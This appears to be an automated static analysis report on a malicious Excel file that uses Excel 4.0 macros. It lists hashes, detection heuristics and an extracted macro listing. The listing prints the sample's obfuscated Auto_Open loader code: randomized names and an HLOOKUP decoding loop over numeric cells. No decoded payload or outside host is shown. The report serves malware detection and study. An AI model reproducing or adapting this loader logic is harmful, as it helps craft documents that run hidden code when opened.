Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c89d1c97521816f1…

MALICIOUS

Office (OLE)

Size: 36.0 KB
Created: 2020-11-27 11:38:35
Authoring application: Microsoft Excel
First seen: 2020-12-25
MD5: 2936cb5063d37c78fbaeb5b71f472310
SHA-1: 08a1c4e41eafffa5f832302f10b25bdcef9159ff
SHA-256: c89d1c97521816f1d426818316ba2113197242b00f41c1d8b6e5fa27d55c77e5
Risk Score: 140

Heuristics (3)

  • Excel 4.0 Auto_Open defined name [critical] OLE_XLM_AUTOOPEN_DEFINEDNAME
    oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
  • XLM Auto_Open with dangerous formula APIs [critical] OLE_XLM_DANGEROUS_FN
    Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
  • Excel 4.0 (XLM) macro sheet present [medium] OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: xlm_macros.txt
Kind: xlm-macro
Source: oletools.olevba.extract_all_macros (XLM macro listing)
Size: 6762 bytes
SHA-256: 7afe5b0e824d479032065a7221e05edda513bfcbedf84e2cc7141ce076cda2ad
Preview of the extracted script (first 1,000 lines):
' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     15 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  oejcQa
' 0018     23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d  Sheet!D176 
' 0018     26 LABEL : Cell Value, String Constant - dqaPQwQvVHw len=0 
' 0018     20 LABEL : Cell Value, String Constant - eaFWa len=0 
' 0018     26 LABEL : Cell Value, String Constant - eEmQrjZpvWX len=0 
' 0018     27 LABEL : Cell Value, String Constant - FiykxkMEshDR len=0 
' 0018     24 LABEL : Cell Value, String Constant - gSaqBsiJJ len=0 
' 0018     23 LABEL : Cell Value, String Constant - GSVndReP len=0 
' 0018     24 LABEL : Cell Value, String Constant - GwuCRBgfz len=0 
' 0018     26 LABEL : Cell Value, String Constant - hOHgjNWOKmc len=0 
' 0018     25 LABEL : Cell Value, String Constant - ieeTKNhnaY len=0 
' 0018     26 LABEL : Cell Value, String Constant - IlooygnvuzL len=0 
' 0018     21 LABEL : Cell Value, String Constant - JGwZwx len=0 
' 0018     26 LABEL : Cell Value, String Constant - KlVOxTVwLNU len=0 
' 0018     26 LABEL : Cell Value, String Constant - nrbrgyTWjat len=0 
' 0018     21 LABEL : Cell Value, String Constant - nsmNKH len=0 
' 0018     23 LABEL : Cell Value, String Constant - oPpYKAIW len=0 
' 0018     21 LABEL : Cell Value, String Constant - qQBkVe len=0 
' 0018     20 LABEL : Cell Value, String Constant - RHlod len=0 
' 0018     25 LABEL : Cell Value, String Constant - sPJgygJEKZ len=0 
' 0018     24 LABEL : Cell Value, String Constant - vRsHFSYLF len=0 
' 0018     21 LABEL : Cell Value, String Constant - yDkCUj len=0 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
'  oejcQa,P59,"",-23.00000000000000000000
'  oejcQa,P60,"",917.00000000000000000000
'  oejcQa,P61,"",638.00000000000000000000
'  oejcQa,P62,"",950.00000000000000000000
'  oejcQa,P63,"",-399.00000000000000000000
'  oejcQa,P64,"",518.00000000000000000000
'  oejcQa,D92,"SET.NAME("nrbrgyTWjat",0+VALUE("0"))",""
'  oejcQa,D97,"SET.NAME("hOHgjNWOKmc",nrbrgyTWjat)",""
'  oejcQa,D100,"SET.NAME("IlooygnvuzL",nrbrgyTWjat)",""
'  oejcQa,D104,"SET.NAME("qQBkVe",COUNTA(eEmQrjZpvWX))",""
'  oejcQa,D106,"SET.NAME("oPpYKAIW",COUNTA(GwuCRBgfz))",""
'  oejcQa,D109,[],""
'  oejcQa,D112,"SET.NAME("gSaqBsiJJ","")",""
'  oejcQa,D114,"hOHgjNWOKmc",""
'  oejcQa,D116,"SET.NAME("eaFWa",HLOOKUP("*",eEmQrjZpvWX,hOHgjNWOKmc,FALSE))",""
'  oejcQa,D119,"FiykxkMEshDR",""
'  oejcQa,D123,"SET.NAME("nsmNKH",nrbrgyTWjat)",""
'  oejcQa,D126,[],""
'  oejcQa,D128,"nsmNKH",""
'  oejcQa,D130,"sPJgygJEKZ",""
'  oejcQa,D133,"ieeTKNhnaY",""
'  oejcQa,D137,"vRsHFSYLF",""
'  oejcQa,D142,"SET.NAME("yDkCUj",VALUE(HLOOKUP("*",GwuCRBgfz,vRsHFSYLF,FALSE)))",""
'  oejcQa,D146,"JGwZwx",""
'  oejcQa,D148,"gSaqBsiJJ",""
'  oejcQa,D153,"IlooygnvuzL",""
'  oejcQa,D157,NEXT(),""
'  oejcQa,D160,"KlVOxTVwLNU",""
'  oejcQa,D164,[],""
'  oejcQa,D166,"dqaPQwQvVHw",""
'  oejcQa,D168,NEXT(),""
'  oejcQa,D172,RETURN(),""
'  oejcQa,D198,"SET.NAME("RHlod",D92)",""
'  oejcQa,D203,"eEmQrjZpvWX",""
'  oejcQa,D205,"SET.NAME("GwuCRBgfz",R58C12)",""
'  oejcQa,D207,"SET.NAME("dqaPQwQvVHw",214)",""
'  oejcQa,D210,"SET.NAME("GSVndReP",4)",""
'  oejcQa,D213,RHlod(),""
'  oejcQa,D214,HALT(),""